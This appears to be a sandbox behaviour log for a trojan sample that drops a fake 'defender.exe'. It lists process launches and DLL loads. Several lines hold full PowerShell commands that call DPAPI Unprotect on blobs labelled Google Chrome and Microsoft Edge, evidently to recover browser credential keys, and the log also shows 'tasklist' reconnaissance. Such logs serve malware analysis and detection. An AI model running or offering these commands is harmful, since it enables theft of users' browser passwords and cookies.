Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,235,192,55,8,18,94,90,72,184,164,229,15,115,193,217,43,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,184,143,231,151,3,164,155,252,199,5,180,234,105,60,58,208,131,221,113,254,201,212,101,30,157,201,120,66,49,155,81,94,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,173,81,165,103,189,238,23,248,169,143,199,131,217,35,105,8,51,181,214,59,46,122,49,169,137,191,37,150,80,49,185,106,48,0,0,0,227,139,161,48,25,1,188,206,13,98,179,209,192,72,44,5,18,32,19,98,83,88,171,61,245,160,191,68,245,147,93,58,123,23,22,100,2,113,63,61,199,163,161,49,20,0,140,172,64,0,0,0,90,215,150,92,233,132,172,0,218,254,112,142,82,73,108,164,141,2,37,168,239,176,249,140,163,197,218,17,138,244,133,244,159,52,96,225,196,138,64,250,229,2,196,46,182,11,157,172,93,116,47,87,27,148,67,58,76,10,131,216,69,102,175,138), $null, 'CurrentUser')
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,235,192,55,8,18,94,90,72,184,164,229,15,115,193,217,43,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,147,162,33,177,8,149,91,236,191,129,249,33,231,27,148,12,171,122,36,70,244,154,79,73,117,181,20,143,206,1,195,45,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,168,140,205,238,188,26,206,16,147,216,104,102,249,250,177,217,113,177,11,10,219,34,181,223,104,67,90,97,29,67,135,198,48,0,0,0,111,7,27,76,231,128,167,166,236,58,4,205,90,176,104,112,26,199,93,23,90,122,68,151,214,153,146,80,144,62,95,230,165,147,143,143,143,124,118,123,23,62,207,33,112,187,137,178,64,0,0,0,245,94,155,216,109,45,241,53,9,114,77,116,165,235,237,86,72,111,74,87,234,83,100,234,81,1,43,5,153,85,142,192,206,173,232,251,142,136,182,197,146,115,49,120,202,240,22,246,11,50,180,177,166,7,64,202,99,182,23,130,212,30,228,156), $null, 'CurrentUser')"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,235,192,55,8,18,94,90,72,184,164,229,15,115,193,217,43,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,147,162,33,177,8,149,91,236,191,129,249,33,231,27,148,12,171,122,36,70,244,154,79,73,117,181,20,143,206,1,195,45,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,168,140,205,238,188,26,206,16,147,216,104,102,249,250,177,217,113,177,11,10,219,34,181,223,104,67,90,97,29,67,135,198,48,0,0,0,111,7,27,76,231,128,167,166,236,58,4,205,90,176,104,112,26,199,93,23,90,122,68,151,214,153,146,80,144,62,95,230,165,147,143,143,143,124,118,123,23,62,207,33,112,187,137,178,64,0,0,0,245,94,155,216,109,45,241,53,9,114,77,116,165,235,237,86,72,111,74,87,234,83,100,234,81,1,43,5,153,85,142,192,206,173,232,251,142,136,182,197,146,115,49,120,202,240,22,246,11,50,180,177,166,7,64,202,99,182,23,130,212,30,228,156), $null, 'CurrentUser')
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Process created: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe "C:\Users\user~1\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\defender" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1832 --field-trial-handle=1804,i,2169737662434373633,7221801736705868447,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Process created: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe "C:\Users\user~1\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\defender" --mojo-platform-channel-handle=2132 --field-trial-handle=1804,i,2169737662434373633,7221801736705868447,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Process created: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe "C:\Users\user~1\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe" --type=renderer --user-data-dir="C:\Users\user\AppData\Roaming\defender" --app-path="C:\Users\user~1\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\resources\app.asar" --no-sandbox --no-zygote --first-renderer-process --lang=en-GB --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=4 --time-ticks-at-unix-epoch=-1722781275767759 --launch-time-ticks=4443586976 --mojo-platform-channel-handle=2360 --field-trial-handle=1804,i,2169737662434373633,7221801736705868447,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:1
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe | Process created: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe C:\Users\user~1\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,235,192,55,8,18,94,90,72,184,164,229,15,115,193,217,43,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,184,143,231,151,3,164,155,252,199,5,180,234,105,60,58,208,131,221,113,254,201,212,101,30,157,201,120,66,49,155,81,94,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,173,81,165,103,189,238,23,248,169,143,199,131,217,35,105,8,51,181,214,59,46,122,49,169,137,191,37,150,80,49,185,106,48,0,0,0,227,139,161,48,25,1,188,206,13,98,179,209,192,72,44,5,18,32,19,98,83,88,171,61,245,160,191,68,245,147,93,58,123,23,22,100,2,113,63,61,199,163,161,49,20,0,140,172,64,0,0,0,90,215,150,92,233,132,172,0,218,254,112,142,82,73,108,164,141,2,37,168,239,176,249,140,163,197,218,17,138,244,133,244,159,52,96,225,196,138,64,250,229,2,196,46,182,11,157,172,93,116,47,87,27,148,67,58,76,10,131,216,69,102,175,138), $null, 'CurrentUser')"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,235,192,55,8,18,94,90,72,184,164,229,15,115,193,217,43,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,147,162,33,177,8,149,91,236,191,129,249,33,231,27,148,12,171,122,36,70,244,154,79,73,117,181,20,143,206,1,195,45,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,168,140,205,238,188,26,206,16,147,216,104,102,249,250,177,217,113,177,11,10,219,34,181,223,104,67,90,97,29,67,135,198,48,0,0,0,111,7,27,76,231,128,167,166,236,58,4,205,90,176,104,112,26,199,93,23,90,122,68,151,214,153,146,80,144,62,95,230,165,147,143,143,143,124,118,123,23,62,207,33,112,187,137,178,64,0,0,0,245,94,155,216,109,45,241,53,9,114,77,116,165,235,237,86,72,111,74,87,234,83,100,234,81,1,43,5,153,85,142,192,206,173,232,251,142,136,182,197,146,115,49,120,202,240,22,246,11,50,180,177,166,7,64,202,99,182,23,130,212,30,228,156), $null, 'CurrentUser')"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess created: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe "C:\Users\user~1\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\defender" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1832 --field-trial-handle=1804,i,2169737662434373633,7221801736705868447,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess created: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe "C:\Users\user~1\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\defender" --mojo-platform-channel-handle=2132 --field-trial-handle=1804,i,2169737662434373633,7221801736705868447,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklistJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,235,192,55,8,18,94,90,72,184,164,229,15,115,193,217,43,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,184,143,231,151,3,164,155,252,199,5,180,234,105,60,58,208,131,221,113,254,201,212,101,30,157,201,120,66,49,155,81,94,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,173,81,165,103,189,238,23,248,169,143,199,131,217,35,105,8,51,181,214,59,46,122,49,169,137,191,37,150,80,49,185,106,48,0,0,0,227,139,161,48,25,1,188,206,13,98,179,209,192,72,44,5,18,32,19,98,83,88,171,61,245,160,191,68,245,147,93,58,123,23,22,100,2,113,63,61,199,163,161,49,20,0,140,172,64,0,0,0,90,215,150,92,233,132,172,0,218,254,112,142,82,73,108,164,141,2,37,168,239,176,249,140,163,197,218,17,138,244,133,244,159,52,96,225,196,138,64,250,229,2,196,46,182,11,157,172,93,116,47,87,27,148,67,58,76,10,131,216,69,102,175,138), $null, 'CurrentUser')Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,235,192,55,8,18,94,90,72,184,164,229,15,115,193,217,43,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,147,162,33,177,8,149,91,236,191,129,249,33,231,27,148,12,171,122,36,70,244,154,79,73,117,181,20,143,206,1,195,45,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,168,140,205,238,188,26,206,16,147,216,104,102,249,250,177,217,113,177,11,10,219,34,181,223,104,67,90,97,29,67,135,198,48,0,0,0,111,7,27,76,231,128,167,166,236,58,4,205,90,176,104,112,26,199,93,23,90,122,68,151,214,153,146,80,144,62,95,230,165,147,143,143,143,124,118,123,23,62,207,33,112,187,137,178,64,0,0,0,245,94,155,216,109,45,241,53,9,114,77,116,165,235,237,86,72,111,74,87,234,83,100,234,81,1,43,5,153,85,142,192,206,173,232,251,142,136,182,197,146,115,49,120,202,240,22,246,11,50,180,177,166,7,64,202,99,182,23,130,212,30,228,156), $null, 'CurrentUser')Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe | Section loaded: dwmapi.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe | Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe | Section loaded: shfolder.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe | Section loaded: iconcodecservice.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe | Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe | Section loaded: ntshrui.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: ffmpeg.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: uiautomationcore.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: kbdus.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: windows.ui.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: windowmanagementapi.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: inputhost.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: twinapi.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: twinapi.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: mscms.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: coloradapterclient.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: mmdevapi.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: devobj.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: iconcodecservice.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: dataexchange.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: d3d11.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: dcomp.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: dxgi.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: windows.globalization.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: bcp47mrm.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: msspellcheckingfacility.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: twinapi.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: atlthunk.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: oleacc.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: directmanipulation.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
